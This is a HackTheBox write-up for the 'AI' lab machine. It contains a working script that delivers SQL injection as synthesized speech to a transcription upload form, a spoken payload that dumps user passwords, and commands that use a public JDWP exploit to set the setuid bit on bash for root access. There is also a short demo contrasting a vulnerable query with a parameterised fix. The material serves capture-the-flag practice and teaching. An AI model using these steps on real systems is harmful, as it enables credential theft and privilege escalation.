AI @ HackTheBox

AI is a 30-point machine on HackTheBox that involves SQL injection via a speech-to-text upload and abusing an exposed Java debugging port (JDWP).

Notes

SQL injection helper:

```python
#!/usr/bin/env python3
# inject.py: render a spoken payload as a WAV file and submit it to the box.
import subprocess
import requests
import shutil
import json
import sys

msg = sys.argv[1]

# text to speech: ttsmp3.com renders the text with the "Joey" voice
headers = {'Content-type': 'application/x-www-form-urlencoded'}
url = 'https://ttsmp3.com/makemp3_new.php'
r = requests.post(url, data={'msg': msg, 'lang': 'Joey', 'source': 'ttsmp3'}, headers=headers)

# download result: the JSON response carries the URL of the generated mp3
url = json.loads(r.text)['URL']
r = requests.get(url, stream=True)
with open('tmp.mp3', 'wb') as f:
    shutil.copyfileobj(r.raw, f)

# convert to wav for the upload form (-y overwrites tmp.wav from a previous run)
subprocess.call(['ffmpeg', '-y', '-i', 'tmp.mp3', 'tmp.wav'])

# upload & check result: the transcribed text is what reaches the SQL query
url = 'http://ai.htb/ai.php'
with open('tmp.wav', 'rb') as wav:
    files = {'fileToUpload': wav}
    r = requests.post(url, files=files, data={'submit': 'Process It!'})
print(r.text)
```

Use the helper to get the user's password:

```shell
python3 inject.py 'open single kwote. union select password from users comment database'
```
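Why the spoken payload works, as an added illustration that is not part of the original post or the box's code: the transcribed text is concatenated straight into the query, so it can add a `UNION` that pulls the `password` column. The schema, the stand-in password and the assumed transcription of the payload are all constructed here; the fixed version binds the text as a parameter instead.

```python
#!/usr/bin/env python3
"""Constructed demo of the injection behind the speech-to-text upload."""
import sqlite3

# Constructed stand-in for the box's database (assumption, not the real schema).
SCHEMA = """
CREATE TABLE users (username TEXT, password TEXT);
INSERT INTO users VALUES ('alexa', 'EXAMPLE-PASSWORD');
CREATE TABLE phrases (output TEXT);
INSERT INTO phrases VALUES ('hello world');
"""

# Assumed transcription of the spoken payload used above:
# "open single kwote. union select password from users comment database"
TRANSCRIBED = "' union select password from users-- -"


def fresh_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def lookup_vulnerable(text: str) -> list:
    """Hypothetical lookup that splices the transcribed text into the SQL."""
    conn = fresh_db()
    sql = "SELECT output FROM phrases WHERE output = '" + text + "'"
    return [row[0] for row in conn.execute(sql)]


def lookup_fixed(text: str) -> list:
    """Same lookup with a bound parameter: the text is only ever a value."""
    conn = fresh_db()
    sql = "SELECT output FROM phrases WHERE output = ?"
    return [row[0] for row in conn.execute(sql, (text,))]


if __name__ == "__main__":
    print("vulnerable:", lookup_vulnerable(TRANSCRIBED))  # leaks the password
    print("fixed:     ", lookup_fixed(TRANSCRIBED))       # no match, no leak
```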

Exploit JDWP (with the port forwarded to localhost):

```shell
searchsploit -x jdwp
searchsploit -m exploits/java/remote/46501.py
python 46501.py -t localhost -p 8000 --cmd "chmod u+s /bin/bash"
curl http://127.0.0.1:8005
/bin/bash -p
```

This post is licensed under CC BY 4.0 by the author.